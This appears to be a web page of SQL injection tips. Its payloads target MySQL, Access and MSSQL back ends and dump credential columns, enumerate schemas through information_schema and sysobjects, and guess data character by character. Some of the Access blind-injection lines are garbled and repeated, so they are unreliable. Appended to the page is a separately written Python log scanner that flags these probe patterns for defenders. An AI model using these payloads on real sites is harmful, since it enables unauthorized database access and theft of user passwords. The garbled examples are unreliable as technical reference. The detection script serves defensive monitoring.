SQL Manual Injection Tips

Source: Internet
Author: User
Tags: mssql

MySQL Chapter
1. Built-in functions and variables

    @@datadir,version(),database(),user(),load_file(),outfile()

2. Using concat(), group_concat(), concat_ws() to concatenate query results
Example:

    xxx.php?id=1 and 1=2 union select 1,group_concat(username,0x3a,password),3 from user

3. Querying table and column names using the built-in information_schema database
List tables:

    xxx.php?id=1 and 1=2 union select 1,2,table_name from (select * from information_schema.tables where table_schema=<hex of database name> order by table_schema limit 0,1)t

List columns:

    xxx.php?id=1 and 1=2 union select 1,2,column_name from (select * from information_schema.columns where table_name=<hex of table name> and table_schema=<hex of database name> order by 1 limit 1,1)t

This can be combined with the concatenation functions:

    xxx.php?id=1 and 1=2 union select 1,2,group_concat(column_name,0x20) from (select * from information_schema.columns where table_name=<hex of table name> and table_schema=<hex of database name> order by 1 limit 0,n)t limit 1--

[n denotes the n-th row of data]

Access Chapter

Guess table name

    *.asp?id=1 and exists (select * from admin)

Guess Column Name

    *.asp?id=1 and exists (select password from admin)

Order by Query

    *.asp?id=1 order by 3

Union query

    *.asp?id=1 union select 1,password,3 from admin

When UNION is not supported
First determine the length of the content:

    *.asp?idfrom>5

Then guess one character at a time:

    *.asp?idfrom admin)>97

For example, if the value of asc(mid(user,1,1)) is found to be 97, the first character of user is a.
Then continue guessing from the second position:

    *.asp?idfrom admin)>97

And so on

MSSQL Chapter
Error-based MSSQL injection:
Determine whether the backend is MSSQL:

    'and exists (select * from sysobjects) --

If the page returns normally, the backend is MSSQL; otherwise sysobjects does not exist and an error is returned.

Guess table name:

    'and exists(select * from admin)--

If the table exists, the normal page is returned; otherwise an error reports that it does not exist.
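
For defenders, the probe shapes listed on this page are distinctive enough to flag in web access logs. The following Python log check is an added example, not part of the original page: it normalizes a request's query string (layered URL encoding, inline comments, case) and matches it against signatures for those probes. The rule names, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probe shapes listed on this page; rule names are this example's own.
RULES = [
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_enumeration", re.compile(r"\binformation_schema\.(tables|columns)\b|\bsysobjects\b")),
    ("exists_probe", re.compile(r"\bexists\s*\(\s*select\b")),
    ("order_by_count", re.compile(r"\border\s+by\s+\d+\b")),
    ("concat_functions", re.compile(r"\b(group_concat|concat_ws|concat)\s*\(")),
    ("char_guess", re.compile(r"\basc\s*\(\s*mid\s*\(")),
    ("mysql_builtin", re.compile(r"@@datadir|\b(load_file|version|database|user)\s*\(")),
]

def normalize(query):
    """Undo up to 3 layers of URL encoding, drop /**/ comments, collapse whitespace."""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    return re.sub(r"\s+", " ", query).lower()

def classify(request_line):
    """Return the names of the rules matched by the query string of a request line."""
    match = re.search(r"\?(\S*)", request_line)
    if not match:
        return []
    text = normalize(match.group(1))
    return [name for name, rx in RULES if rx.search(text)]

def scan(lines):
    """Map 1-based line number -> matched rule names, for lines with at least one hit."""
    return {i: hits for i, line in enumerate(lines, 1) if (hits := classify(line))}

# Constructed sample request lines (not taken from any real log).
SAMPLE_LOG = [
    "GET /xxx.php?id=1 HTTP/1.1",
    "GET /xxx.php?id=1+and+1=2+union+select+1,group_concat(username,0x3a,password),3+from+user HTTP/1.1",
    "GET /xxx.php?id=1%20and%201=2%20UNION/**/SELECT%201,2,table_name%20from%20information_schema.tables HTTP/1.1",
    "GET /list.asp?id=1%20and%20exists%20(select%20*%20from%20admin) HTTP/1.1",
    "GET /list.asp?id=1%20order%20by%203 HTTP/1.1",
    "GET /list.asp?id=1%2527%2520and%2520exists(select%2520*%2520from%2520sysobjects)-- HTTP/1.1",
    "GET /search.php?q=order+by+price&sort=asc HTTP/1.1",
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(f"line {lineno}: {', '.join(hits)}")
```

A hit is a triage lead, not proof of compromise; the durable fix for every probe on this page is a parameterized query on the `id` parameter.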
